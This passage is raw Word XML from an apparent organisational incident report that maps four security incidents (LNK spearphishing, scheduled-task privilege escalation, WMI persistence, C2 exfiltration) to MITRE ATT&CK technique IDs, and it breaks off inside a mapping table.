        <w:t>This document provides an overview of the tools, tactics and techniques demonstrated in recent cybersecurity incidents that have occurred within the organisation, along with the various detection, mitigation/remediation and recommended security controls to further strengthen the organisation’s security posture:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF756D" w:rsidP="00E71233" w:rsidRDefault="00FF756D" w14:paraId="1B01CE56" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="3939"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FF3308" w:rsidTr="00B64716" w14:paraId="7C25EF81" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="912"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004C02FF" w:rsidR="00FF3308" w:rsidP="00EC5A44" w:rsidRDefault="00FF3308" w14:paraId="2F556860" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Incident Number &amp; Title Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004C02FF" w:rsidR="00FF3308" w:rsidP="00EC5A44" w:rsidRDefault="00FF3308" w14:paraId="7A91E803" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004C02FF" w:rsidR="00FF3308" w:rsidP="00EC5A44" w:rsidRDefault="00FF3308" w14:paraId="4A7EC3AF" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Technique Name &amp; ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB4373" w:rsidTr="00CB4373" w14:paraId="4E1F5E1C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="198"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00CB4373" w:rsidP="00EC5A44" w:rsidRDefault="38774E48" w14:paraId="56622D62" w14:textId="6416D285">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Incident #001 – Spearphishing Attachment (LNK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00CB4373" w:rsidP="00EC5A44" w:rsidRDefault="2A23AEA7" w14:paraId="0F73FCD2" w14:textId="1BEDDFDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00CB4373" w:rsidP="252AFF6E" w:rsidRDefault="646325F4" w14:paraId="79B0FF43" w14:textId="0DBCE81D">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spear phishing Attachment</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00CB4373" w:rsidP="252AFF6E" w:rsidRDefault="0AD16C7C" w14:paraId="6FB6AD33" w14:textId="718CEA3E">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – T1566.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF3308" w:rsidTr="00B64716" w14:paraId="46A97BDA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="291"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00FF3308" w:rsidP="00EC5A44" w:rsidRDefault="00CB4373" w14:paraId="246A3742" w14:textId="0809A68F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:commentRangeStart w:id="9"/>
            <w:commentRangeEnd w:id="9"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:commentReference w:id="9"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Incident #002 – Privileged Escalation via Insecure Scheduled Task Permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00FF3308" w:rsidP="00EC5A44" w:rsidRDefault="19B207BF" w14:paraId="19D6A5B6" w14:textId="0FE6DC3A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CB4373" w:rsidR="00EC5A44" w:rsidP="00EC5A44" w:rsidRDefault="3A6FC043" w14:paraId="5A9FFC93" w14:textId="4B50BCD3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Scheduled Task/Job: Scheduled Task - T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C68A4F" w:rsidTr="00C68A4F" w14:paraId="40750D72" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="291"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C68A4F" w:rsidP="00C68A4F" w:rsidRDefault="16C7C104" w14:paraId="3E1B4748" w14:textId="780FCCAC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident #003 - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permanent WMI Event Subscription Persistence (Timer-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C68A4F" w:rsidP="00C68A4F" w:rsidRDefault="7955228A" w14:paraId="01C289B9" w14:textId="2C12063E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C68A4F" w:rsidP="00C68A4F" w:rsidRDefault="6E5B472A" w14:paraId="3687F706" w14:textId="745BF794">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Event Triggered Execution: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Management Instrumentation - T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C68A4F" w:rsidTr="00C68A4F" w14:paraId="12D31EA4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="291"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C68A4F" w:rsidP="00C68A4F" w:rsidRDefault="3BDDE454" w14:paraId="40289004" w14:textId="334B1175">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Incident #004 – Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C68A4F" w:rsidP="00C68A4F" w:rsidRDefault="4F6B5FE4" w14:paraId="7BB79DDE" w14:textId="2385169A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C68A4F" w:rsidP="00C68A4F" w:rsidRDefault="4F6B5FE4" w14:paraId="24C169EA" w14:textId="5F37DB6D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel – T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004C02FF" w:rsidP="00E71233" w:rsidRDefault="004C02FF" w14:paraId="6F013BF9" w14:textId="77777777"/>
    <w:p w:rsidR="00506EEA" w:rsidP="00705FA1" w:rsidRDefault="00381555" w14:paraId="3EFC33BB" w14:textId="7D0467DC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Should a pictorial representation of the Tactics, Techniques and Procedures (TTPs) is required, please refer to the following JSON file which can be loaded onto the </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>ATT&amp;CK® Navigator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> website:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600810" w:rsidP="00705FA1" w:rsidRDefault="00F62D9D" w14:paraId="03E76B54" w14:textId="0F245AA0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="1504" w:dyaOrig="981" w14:anchorId="398DC75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5pt;height:48.75pt" o:ole="" type="#_x0000_t75">
            <v:imagedata o:title="" r:id="rId21"/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1831686503" r:id="rId22"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E749F5" w:rsidP="63D07F38" w:rsidRDefault="00E749F5" w14:paraId="339AB2F6" w14:textId="649EC238">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E749F5" w:rsidP="00705FA1" w:rsidRDefault="00E749F5" w14:paraId="1EDE7D46" w14:textId="62C4D444">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="006936E1" w:rsidP="00B66DA4" w:rsidRDefault="006211AB" w14:paraId="58789628" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896678" w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detailed List of Cybersecurity Incidents &amp; TTPs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00C3354B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="49002A44" w14:textId="6BD0E84C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896679" w:id="11"/>
      <w:bookmarkStart w:name="_Toc36764273" w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Incident #001 – Spearphishing Attachment (LNK)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00C3354B" w:rsidP="6845FCFF" w:rsidRDefault="00C3354B" w14:paraId="2525716C" w14:textId="2F1437EB"/>
    <w:p w:rsidRPr="003419C9" w:rsidR="00C3354B" w:rsidP="00C3354B" w:rsidRDefault="00C3354B" w14:paraId="287CFD80" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896680" w:id="13"/>
      <w:commentRangeStart w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="14"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="9182" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1472"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C3354B" w:rsidTr="6845FCFF" w14:paraId="31EA40B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rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="001B4A08" w:rsidRDefault="00C3354B" w14:paraId="5E15D2FE" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="001B4A08" w:rsidRDefault="00C3354B" w14:paraId="064C3CA8"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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="001B4A08" w:rsidRDefault="00C3354B" w14:paraId="35BFBF77"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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="001B4A08" w:rsidRDefault="00C3354B" w14:paraId="1821082F"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Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="001B4A08" w:rsidRDefault="00C3354B" w14:paraId="46439F48"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="001B4A08" w:rsidRDefault="00C3354B" w14:paraId="2B426D71"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Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="001B4A08" w:rsidRDefault="00C3354B" w14:paraId="2E6D4B30"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Cs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3354B" w:rsidTr="6845FCFF" w14:paraId="2E41E6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rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="02C06806" w14:textId="70249FA9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="00FC0D9E" w:rsidRDefault="6845FCFF" w14:paraId="2A63579E" w14:textId="54642C30">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1566.00</w:t>
            </w:r>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="40250D09" w14:textId="7389DD40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="6871EB6F" w14:textId="0DBCE81D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spear phishing Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00C3354B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="7561E101" w14:textId="44A2D30B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
